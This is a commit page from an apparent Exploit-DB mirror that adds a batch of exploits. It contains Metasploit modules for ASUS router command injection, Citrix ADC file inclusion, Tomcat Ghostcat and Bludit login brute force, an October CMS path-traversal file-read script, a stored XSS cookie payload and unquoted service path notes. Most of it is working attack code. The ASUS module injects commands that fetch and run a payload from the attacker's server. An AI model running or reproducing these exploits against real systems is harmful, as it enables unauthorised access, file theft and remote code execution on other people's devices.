bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-11-14

Browse source 
10 changes to exploits/shellcodes

DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path
SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path
IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)
Citrix ADC NetScaler - Local File Inclusion (Metasploit)
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)
Touchbase.io 1.10 - Stored Cross Site Scripting
OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure
October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)

ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)
This commit is contained in:
Offensive Security 2020-11-14 05:01:59 +00:00
parent ccc8fe2331
commit b33d1ec015
11 changed files with 945 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

132
exploits/hardware/webapps/49036.rb Executable file
View file

@ -0,0 +1,132 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ASUS TM-AC1900 - Arbitrary Command Execution',
'Description' => %q{
This module exploits a code execution vulnerability within the ASUS
TM-AC1900 router as an authenicated user. The vulnerability is due to
a failure filter out percent encoded newline characters (%0a) within
the HTTP argument 'SystemCmd' when invoking "/apply.cgi" which bypasses
the patch for CVE-2018-9285.
},
'Author' =>
[
'b1ack0wl' # vuln discovery + exploit developer
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'References' =>
[
# CVE which shows that this functionality has been patched before ;)
['URL', 'https://www.cvedetails.com/cve/CVE-2018-9285/'],
['URL', 'https://github.com/b1ack0wl/OffensiveCon20/tree/master/TM-AC1900']
],
'Privileged' => true,
'Targets' =>
[
# this may work on other asus routers as well, but I've only tested this on the TM-AC1900.
[ 'ASUS TM-AC1900 <= v3.0.0.4.376_3199',
{}
]
],
'DisclosureDate' => 'April 18, 2020',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'Username for the web portal.', 'admin']),
OptString.new('PASSWORD', [true, 'Password for the web portal.', 'admin'])
])
end
def check_login
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "/Main_Analysis_Content.asp",
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
})
if res and res.code == 200
# all good :)
return res
else
fail_with(Failure::NoAccess, 'Invalid password.')
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Connection failed.')
end
end
def on_request_uri(cli, request)
if request.uri == '/'
# injected command has been executed
print_good("Sending bash script...")
@filename = rand_text_alpha(16)
bash_script = %Q|
#!/bin/sh
wget #{@lhost_srvport}/#{rand_text_alpha(16)} -O /tmp/#{@filename}
chmod +x /tmp/#{@filename}
/tmp/#{@filename} &
|
send_response(cli, bash_script)
else
# bash script has been executed. serve up the ELF file
exe_payload = generate_payload_exe()
print_good("Sending ELF file...")
send_response(cli, exe_payload)
# clean up
register_file_for_cleanup("/tmp/index.html")
register_file_for_cleanup("/tmp/#{@filename}")
end
end
def exploit
# make sure the supplied password is correct
check_login
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['LHOST']
else
srv_host = datastore['SRVHOST']
end
print_status("Exploiting #{target.name}...")
@lhost_srvport = "#{srv_host}:#{datastore['SRVPORT']}"
start_service({'Uri' => {'Proc' => Proc.new {
|cli, req| on_request_uri(cli, req)
},
'Path' => '/'
}})
begin
# store the cmd to be executed
cmd = "ping+-c+1+127.0.0.1;cd+..;cd+..;cd+tmp;rm+index.html;"
cmd << "wget+#{@lhost_srvport};chmod+777+index.html;sh+index.html"
res = send_request_cgi({
'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
# spaces need to be '+' and not %20, so cheap hack.exe it is.
# required HTTP args: SystemCmd, action_mode, and current_page
'uri' => "/apply.cgi?SystemCmd=#{cmd.gsub(';',"%0a")}&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp"
})
# now trigger it via check_login
res = check_login
if res and res.code == 200
print_status("Waiting up to 10 seconds for the payload to execute...")
select(nil, nil, nil, 10)
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

170
exploits/hardware/webapps/49038.rb Executable file
View file

@ -0,0 +1,170 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',
'Description' => %{
The remote device is affected by multiple vulnerabilities.
An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.
An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit
this to bypass authorization (CVE-2020-8193).
And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.
},
'Author' => [
'Donny Maasland', # Discovery
'mekhalleh (RAMELLA Sébastien)' # Module author (Zeop Entreprise)
],
'References' => [
['CVE', '2020-8193'],
['CVE', '2020-8195'],
['CVE', '2020-8196'],
['URL', 'https://dmaasland.github.io/posts/citrix.html'],
['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],
['URL', 'https://github.com/jas502n/CVE-2020-8193']
],
'DisclosureDate' => '2020-07-09',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
}
))
register_options([
OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),
OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def create_session
params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'
request = {
'method' => 'POST',
'uri' => "#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}",
'ctype' => 'application/xml',
'headers' => {
'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)
},
'data' => '<appfwprofile><login></login></appfwprofile>'
}
request = request.merge({'cookie' => @cookie}) if @cookie
response = send_request_raw(request)
unless response && response.code == 406
print_error("#{@message_prefix} - No response to session request.")
return
end
response.get_cookies
end
def fix_session_rand
response = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),
'cookie' => @cookie,
'vars_get' => {
'sid' => 'nsroot',
'username' => 'nsroot',
'force_setup' => '1'
}
)
if response && response.code == 302
location = response.headers['location']
response = send_request_cgi(
'method' => 'GET',
'uri' => location,
'cookie' => @cookie
)
return unless response && response.code == 200
end
response.to_s.scan(/rand = "([^"]+)"/).join
end
def read_lfi(path, var_rand)
params = "filter=path:#{path}"
request = {
'method' => 'POST',
'uri' => "#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}",
'cookie' => @cookie,
'ctype' => 'application/xml',
'headers' => {
'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),
'rand_key' => var_rand
},
'data' => '<clipermission></clipermission>'
}
response = send_request_raw(request)
end
def run_host(ip)
proto = (datastore['SSL'] ? 'https' : 'http')
@message_prefix = "#{proto}://#{ip}:#{datastore['RPORT']}"
@cookie = create_session
if @cookie && @cookie =~ /SESSID/
print_status("#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}")
var_rand = fix_session_rand
unless var_rand
print_error("#{@message_prefix} - Unable to get rand value.")
return Exploit::CheckCode::Unknown
end
print_status("#{@message_prefix} - Got rand: #{var_rand}")
print_status("#{@message_prefix} - Re-breaking session...")
create_session
case datastore['MODE']
when /discovery/
response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)
if response.code == 406
if response.body.include? ('root:*:0:0:')
print_warning("#{@message_prefix} - Vulnerable.")
return Exploit::CheckCode::Vulnerable
end
end
when /interactive/
# TODO: parse response
response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)
if response.code == 406
print_line("#{response.body}")
end
return
when /sessions/
# TODO: parse response
response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)
if response.code == 406
print_line("#{response.body}")
end
return
end
end
print_good("#{@message_prefix} - Not Vulnerable.")
return Exploit::CheckCode::Safe
end
end

276
exploits/multiple/webapps/49039.rb Executable file
View file

@ -0,0 +1,276 @@
require "msf/core"
class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
"Name" => "Ghostcat",
"Description" => %q{
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
},
"Author" =>
[
"A Security Researcher of Chaitin Tech", #POC
"ThienNV - SunCSR" #Metasploit Module
],
"License" => MSF_LICENSE,
"References" =>
[
[ "CVE", "2020-1938"]
],
"Privileged" => false,
"Platform" => %w{ java linux win},
"Targets" =>
[
["Automatic",
{
"Arch" => ARCH_JAVA,
"Platform" => "win"
}
],
[ "Java Windows",
{
"Arch" => ARCH_JAVA,
"Platform" => "win"
}
],
[ "Java Linux",
{
"Arch" => ARCH_JAVA,
"Platform" => "linux"
}
]
],
"DefaultTarget" => 0))
register_options(
[
OptString.new("FILENAME",[true,"File name","/WEB-INF/web.xml"]),
OptBool.new('SSL', [ true, 'SSL', false ]),
OptPort.new('PORTWEB', [ false, 'Set a port webserver'])
],self.class)
end
def method2code(method)
methods = {
"OPTIONS" => 1,
"GET" => 2,
"HEAD" => 3,
"POST" => 4,
"PUT" => 5,
"DELETE" => 6,
"TRACE" => 7,
"PROPFIND" => 8
}
code = methods[method]
return code
end
def make_headers(headers)
header2code = {
"accept" => "\xA0\x01",
"accept-charset" => "\xA0\x02",
"accept-encoding" => "\xA0\x03",
"accept-language" => "\xA0\x04",
"authorization" => "\xA0\x05",
"connection" => "\xA0\x06",
"content-type" => "\xA0\x07",
"content-length" => "\xA0\x08",
"cookie" => "\xA0\x09",
"cookie2" => "\xA0\x0A",
"host" => "\xA0\x0B",
"pragma" => "\xA0\x0C",
"referer" => "\xA0\x0D",
"user-agent" => "\xA0\x0E"
}
headers_ajp = Array.new
for (header_name, header_value) in headers do
code = header2code[header_name].to_s
if code != ""
headers_ajp.append(code)
headers_ajp.append(ajp_string(header_value.to_s))
else
headers_ajp.append(ajp_string(header_name.to_s))
headers_ajp.append(ajp_string(header_value.to_s))
end
end
return int2byte(headers.length,2), headers_ajp
end
def make_attributes(attributes)
attribute2code = {
"remote_user" => "\x03",
"auth_type" => "\x04",
"query_string" => "\x05",
"jvm_route" => "\x06",
"ssl_cert" => "\x07",
"ssl_cipher" => "\x08",
"ssl_session" => "\x09",
"req_attribute" => "\x0A",
"ssl_key_size" => "\x0B"
}
attributes_ajp = Array.new
for attr in attributes
name = attr.keys.first.to_s
code = (attribute2code[name]).to_s
value = attr[name]
if code != ""
attributes_ajp.append(code)
if code == "\x0A"
for v in value
attributes_ajp.append(ajp_string(v.to_s))
end
else
attributes_ajp.append(ajp_string(value.to_s))
end
end
end
return attributes_ajp
end
def ajp_string(message_bytes)
message_len_int = message_bytes.length
return int2byte(message_len_int,2) + message_bytes + "\x00"
end
def int2byte(data, byte_len=1)
if byte_len == 1
return [data].pack("C")
else
return [data].pack("n*")
end
end
def make_forward_request_package(method,headers,attributes)
prefix_code_int = 2
prefix_code_bytes = int2byte(prefix_code_int)
method_bytes = int2byte(method2code(method))
protocol_bytes = "HTTP/1.1"
req_uri_bytes = "/index.txt"
remote_addr_bytes = "127.0.0.1"
remote_host_bytes = "localhost"
server_name_bytes = datastore['RHOST'].to_s
if datastore['SSL'] == true
is_ssl_boolean = 1
else
is_ssl_boolean = 0
end
server_port_int = datastore['PORTWEB']
if server_port_int.to_s == ""
server_port_int = (is_ssl_boolean ^ 1) * 80 + (is_ssl_boolean ^ 0) * 443
end
is_ssl_bytes = int2byte(is_ssl_boolean,1)
server_port_bytes = int2byte(server_port_int, 2)
headers.append(["host", "#{server_name_bytes}:#{server_port_int}"])
num_headers_bytes, headers_ajp_bytes = make_headers(headers)
attributes_ajp_bytes = make_attributes(attributes)
message = Array.new
message.append(prefix_code_bytes)
message.append(method_bytes)
message.append(ajp_string(protocol_bytes.to_s))
message.append(ajp_string(req_uri_bytes.to_s))
message.append(ajp_string(remote_addr_bytes.to_s))
message.append(ajp_string(remote_host_bytes.to_s))
message.append(ajp_string(server_name_bytes.to_s))
message.append(server_port_bytes)
message.append(is_ssl_bytes)
message.append(num_headers_bytes)
message += headers_ajp_bytes
message += attributes_ajp_bytes
message.append("\xff")
message_bytes = message.join
send_bytes = "\x12\x34" + ajp_string(message_bytes.to_s)
return send_bytes
end
def send_recv_once(data)
buf = ""
begin
connect(true, {'RHOST'=>"#{datastore['RHOST'].to_s}", 'RPORT'=>datastore['RPORT'].to_i, 'SSL'=>datastore['SSL']})
sock.put(data)
buf = sock.get_once || ""
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
ensure
disconnect
end
return buf
end
def read_buf_string(buf, idx)
len = buf[idx..(idx+2)].unpack('n')[0]
idx += 2
print "#{buf[idx..(idx+len)]}"
idx += len + 1
idx
end
def parse_response(buf, idx)
common_response_headers = {
"\x01" => "Content-Type",
"\x02" => "Content-Language",
"\x03" => "Content-Length",
"\x04" => "Date",
"\x05" => "Last-Modified",
"\x06" => "Location",
"\x07" => "Set-Cookie",
"\x08" => "Set-Cookie2",
"\x09" => "Servlet-Engine",
"\x0a" => "Status",
"\x0b" => "WWW-Authenticate",
}
idx += 2
idx += 2
if buf[idx] == "\x04"
idx += 1
print "Status Code: "
idx += 2
idx = read_buf_string(buf, idx)
puts
header_num = buf[idx..(idx+2)].unpack('n')[0]
idx += 2
for i in 1..header_num
if buf[idx] == "\xA0"
idx += 1
print "#{common_response_headers[buf[idx]]}: "
idx += 1
idx = read_buf_string(buf, idx)
puts
else
idx = read_buf_string(buf, idx)
print(": ")
idx = read_buf_string(buf, idx)
puts
end
end
elsif buf[idx] == "\x05"
return 0
elsif buf[idx] == "\x03"
idx += 1
puts
idx = read_buf_string(buf, idx)
else
return 1
end
parse_response(buf, idx)
end
def run
headers = Array.new
method = "GET"
target_file = datastore['FILENAME'].to_s
attributes = [
{"req_attribute" => ["javax.servlet.include.request_uri", "index"]},
{"req_attribute" => ["javax.servlet.include.path_info" , target_file]},
{"req_attribute" => ["javax.servlet.include.servlet_path" , "/"]}
]
data = make_forward_request_package(method, headers, attributes)
buf = send_recv_once(data)
parse_response(buf, 0)
end
end

20
exploits/multiple/webapps/49040.txt Normal file
View file

@ -0,0 +1,20 @@
#Exploit Title: Touchbase.io 1.10 - Stored Cross Site Scripting
#Date: 2020-11-11
#Exploit Author: Simran Sankhala
#Vendor Homepage: https://touchbase.ai/
#Software Link: https://touchbase.ai/
#Version: 1.1.0
#Tested on: Windows 10
#Proof Of Concept:
touchbase.ai application allows stored XSS, via the 'Add User' module,
that is rendered upon 'Contacts' page visit.
To exploit this vulnerability:
Steps to Reproduce:
1. Login to the application, goto 'Contacts' module and add the user
2. Inject the payload = <marquee onstart=alert(document.cookie)> in the
'Name' field
3. Fill the other details, and save the details.
4. Go to the 'Contacts' module again, and we can see that our entered
XSS Script is executed in the name field and the pop-up appears with the
session cookie details.

170
exploits/php/webapps/49037.rb Executable file
View file

@ -0,0 +1,170 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Bludit Panel Brute force',
'Description' => %q{
This Module performs brute force attack on Bludit Panel.
},
'Author' => 'Eren Simsek <egtorteam@gmail.com>',
'License' => MSF_LICENSE,
'DisclosureDate' => 'June 7 2020')
register_options(
[
OptString.new('TARGETURI', [ true, 'Bludit Panel Uri', 'admin']),
OptString.new('USERNAME', [ false, 'Bludit account username']),
OptString.new('PASSWORD', [ false, 'Bludit account password']),
OptPath.new('USER_FILE', [ false, 'The User wordlist path']),
OptPath.new('PASS_FILE', [ false, 'The Pass wordlist path']),
OptBool.new('USER_AS_PASS', [ false, 'Try the username as the password for all users']),
])
end
def check_variable
if datastore["USERNAME"] != nil
if datastore["USER_FILE"] != nil
raise Msf::OptionValidateError.new(['USER_FILE'])
end
end
if datastore["PASSWORD"] != nil
if datastore["PASS_FILE"] != nil
raise Msf::OptionValidateError.new(['PASS_FILE'])
end
end
if datastore["USER_FILE"] != nil
if datastore["USERNAME"] != nil
raise Msf::OptionValidateError.new(['USERNAME'])
end
end
if datastore["PASS_FILE"] != nil
if datastore["PASSWORD"] != nil
raise Msf::OptionValidateError.new(['PASSWORD'])
end
end
end
@signed = false
def brute_force(username,password)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/'),
'method' => 'GET',
})
#Send request target website
username = username.strip
password = password.strip
#strip command remove spaces
bluditkey = res.get_cookies
#Send request target website and get cookies
csrf = res.body.scan(/<input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)">/).flatten[0] || ''
#Get CSRF Token
if bluditkey == nil #if cookies not found
fail_with(Failure::UnexpectedReply, "Cookie Not Found !")
end
if csrf == nil #if csrf token not found
fail_with(Failure::UnexpectedReply, "CSRF Not Found !")
end
print_warning("Trying #{username}:#{password}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/'),
'method' => 'POST',
'cookie' => bluditkey,
'headers' => {
'X-Forwarded-For' => password, #host injected and unblock ip address
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer' => normalize_uri(target_uri.path,'/'),
},
'vars_post' => { #post method variables
'tokenCSRF' => csrf,
'username' => username,
'password' => password,
'save' => '',
},
})
if res && res.code != 200 #if request cod not 200 ok
if res && res.headers['Location'] == '/admin/dashboard' #if signed web site
print_good("Found #{username}:#{password}")
@signed = true
else #request not 200 error
fail_with(Failure::UnexpectedReply, " Request Not Success Code #{res.code}")
end
end
end
def run
check_variable #check variable, not use user_file if use username
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/'),
'method' => 'GET',
})
if res && res.code == 200
vprint_status("Request 200 OK")
else
fail_with(Failure::UnexpectedReply, "Request Not Success Code #{res.code}")
end
if datastore["USERNAME"] != nil && datastore["PASS_FILE"] != nil
unless ::File.exist?(datastore['PASS_FILE'])
#check file exit, error not found if not exist file
fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!"
end
@wordlist = ::File.open(datastore["PASS_FILE"],"rb")
#open pass_file
@wordlist.each_line do |password|
#each line on wordlist
password = password.strip # remove spaces
if !@signed # continue if signed false
brute_force(datastore["USERNAME"],password)
end
end
end
if datastore["USER_FILE"] != nil && datastore["PASSWORD"] != nil
unless ::File.exist?(datastore['USER_FILE'])
fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!"
end
@wordlist = ::File.open(datastore["USER_FILE"],"rb")
@wordlist.each_line do |username|
username = username.strip
if !@signed
brute_force(username,datastore["PASSWORD"])
end
end
end
if datastore["USER_FILE"] != nil && datastore["PASS_FILE"] != nil
unless ::File.exist?(datastore['USER_FILE'])
fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!"
end
unless ::File.exist?(datastore['PASS_FILE'])
fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!"
end
@userlist = ::File.open(datastore["USER_FILE"],"rb")
@userlist.each_line do |username|
username = username.strip
@passlist = ::File.open(datastore["PASS_FILE"],"rb")
@passlist.each_line do |password|
password = password.strip
if !@signed
brute_force(username,password)
end
end
end
end
if datastore["USER_FILE"] != nil && datastore["USER_AS_PASS"] == true && datastore["PASS_FILE"] == nil
unless ::File.exist?(datastore['USER_FILE'])
fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exist!"
end
@userlist = ::File.open(datastore["USER_FILE"],"rb")
@userlist.each_line do |username|
username = username.strip
@passlist = ::File.open(datastore["USER_FILE"],"rb")
@passlist.each_line do |password|
password = password.strip
if !@signed
brute_force(username,password)
end
end
end
end
end
end

27
exploits/php/webapps/49044.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure
# Date: 11-06-2020
# Vendor Homepage: https://www.journal-theme.com/
# Vendor Changelog: https://docs.journal-theme.com/changelog
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/sql-errors-data-exposure-in-journal-opencart-theme/
# Version: 3.0.46 and below
# CVE : CVE-2020-15478
1. Description
Journal, the best selling OpenCart theme used in over 25K websites, was found to expose sensitive information and be potentially vulnerable to more attacks such as SQL Injection.
Sensitive Data Exposure, an OWASP Top 10 vulnerability, occurs when an application fails to adequately secure sensitive data. The information exposed can include passwords, session tokens, credit card data, private health data, and more.
2. Vulnerability
Due to the way the “page” parameter is typecast as an integer in /catalog/controller/journal3/blog.php, if someone enters a string, this results in a detailed error message showing SQL error, database details, and internal path.
Such information can help an attacker better prepare their attacks. We see that $page is type casted to an integer using $page = (int)Arr::get($this->request->get, 'page', 1); in the mentioned file.
All OpenCart websites using the Journey theme version 3.0.46 and below are affected.
3. Timeline
Vulnerability reported to the Journal team June 11, 2020
Journal Theme version 3.1.0 containing the fix to the vulnerability released July 1, 2020

56
exploits/php/webapps/49045.sh Executable file
View file

@ -0,0 +1,56 @@
# Exploit Title: October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)
# Date: 2020-03-31
# Exploit Author: Sivanesh Ashok
# Vendor Homepage: https://octobercms.com/
# Version: Build 465 and below
# Tested on: Windows 10 / XAMPP / October CMS Build 465
# CVE: CVE-2020-5295
echo '''
Authenticated arbitrary file read exploit for October CMS <= Build 465
Tested on: v1.0.45
'''
rm /tmp/ocms_* &> /dev/null
if [[ ! `command -v recode` ]]; then
echo -e "[!] Missing package 'recode'\n[!] Install 'recode' using the respective command to resume\n\tsudo apt install recode\n\tsudo pacman -S recode\n\tyum install recode"
echo -e "[*] Exiting!\n"
exit 0
fi
read -p "[*] Enter target host (with http/https): " host
echo ""
read -p "[*] Enter your cookie value: " cookie
curl -s -X GET -H "Cookie: $cookie" "$host/backend/cms" > /tmp/ocms_gethtml
if [[ ! `awk '/<span class="nav-label">/,/<\/span>/' /tmp/ocms_gethtml | grep "Assets"` ]]; then
echo -e "[-] Invalid cookie\n[-] Either the user does not have the privilege to modify assets or the cookie is invalid"
echo -e "[*] Exiting!\n"
exit 0
fi
echo '''
[!] Relative path to the target file is required.
eg. config/database.php
If you are unsure about the path, check OctoberCMS github which has the default file system hosted
https://github.com/octobercms/october
'''
read -p "[*] Enter path to the target file: " targetfile
themename=`grep "data-item-theme" /tmp/ocms_gethtml -m 1 | awk -F'"' '{print $6}'`
csrftoken=`grep "csrf-token" /tmp/ocms_gethtml | awk -F'"' '{print $4}'`
curl -s -X POST -H "Cookie: $cookie" -H "X-CSRF-TOKEN: $csrftoken" -H "X-OCTOBER-REQUEST-HANDLER: onOpenTemplate" -H "X-Requested-With: XMLHttpRequest" -d "theme=$themename" -d "type=asset" -d "path=../../../$targetfile" "$host/backend/cms" > /tmp/ocms_jsonres
cat /tmp/ocms_jsonres | jq -r '.tab' 2> /dev/null | awk '/<textarea/,/<\/textarea>/' 2> /dev/null | recode html > /tmp/ocms_file 2> /dev/null
if [[ `cat /tmp/ocms_file` ]]; then
cp /tmp/ocms_file ./october_extractedfile
echo -e "\n[+] File saved as ./october_extractedfile!\n"
exit 1
else
echo -e "\n[-] Error extracting file. Check /tmp/ocms_jsonres for the server response. Exiting!\n"
exit 0
fi

27
exploits/windows/local/49041.txt Normal file
View file

@ -0,0 +1,27 @@
#Exploit Title: DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path
# Discovery by: Teresa Q
# Discovery Date: 2020-11-11
# Vendor:DigitalPersona U. are U. One Touch
# Version: 5.1.0.656
# Vulnerability Type: Unquoted Service Path
# Vendor Homepage : https://www.hidglobal.com/crossmatch
# Tested on OS: Windows 10 Home x64 es
#Analyze PoC :
==============
C:\>sc qc "DpHost"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DpHost
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\DigitalPersona\Bin\DpHostW.exe
GRUPO_ORDEN_CARGA : BiometricGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Servicio de autenticación biométrica
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
C:\>

26
exploits/windows/local/49042.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path
# Discovery by: Mara Ramirez
# Discovery Date: 10-11-2020
# Vendor Homepage: https://www.segurazo.com/download.html
# Software Links : https://www.segurazo.com/download.html
# Tested Version: 10.0.21.61
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home Single Languaje
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ SAntivirusIC SAntivirusIC C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe -service Auto
C:\>sc qc SAntivirusIC
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SAntivirusIC
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe -service
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : SAntivirusIC
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

31
exploits/windows/local/49043.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path
# Discovery by: Isabel Lopez
# Software link: https://www.pconlife.com/download/otherfile/20566/098185e9b7c417cf7480bb9f839db652/
# Discovery Date: 2020-11-07
# Tested Version: 1.0.6425.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto
# Service info:
c:\>sc qc STacSV
[SC] QueryServiceConfig SUCCES
SERVICE_NAME: STacSV
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\Program Files\IDT\WDM\STacSV64.exe
LOAD_ORDER_GROUP : AudioGroup
TAG : 0
DISPLAY_NAME : Audio Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

10
files_exploits.csv
View file

@ -10421,6 +10421,9 @@ id,file,description,date,author,type,platform,port
49021,exploits/windows/local/49021.txt,"RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path",2020-11-09,"Erick Galindo",local,windows,
49022,exploits/windows/local/49022.txt,"DiskBoss v11.7.28 - Multiple Services Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows,
49023,exploits/windows/local/49023.txt,"Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows,
49041,exploits/windows/local/49041.txt,"DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path",2020-11-13,"Teresa Q",local,windows,
